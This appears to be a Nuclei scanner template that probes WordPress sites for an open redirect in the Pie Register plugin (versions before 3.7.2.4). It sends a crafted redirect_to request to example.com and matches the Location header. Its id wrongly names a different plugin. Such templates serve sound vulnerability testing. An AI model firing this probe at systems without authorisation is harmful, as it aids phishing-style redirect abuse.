id: wptouch-plugin-open-redirect

info:
  name: Pie Register < 3.7.2.4 - Open Redirect
  author: 0x_Akoko
  reference: https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4
  severity: low
  tags: wp,redirect,wp-plugin

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com"

    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
        part: header
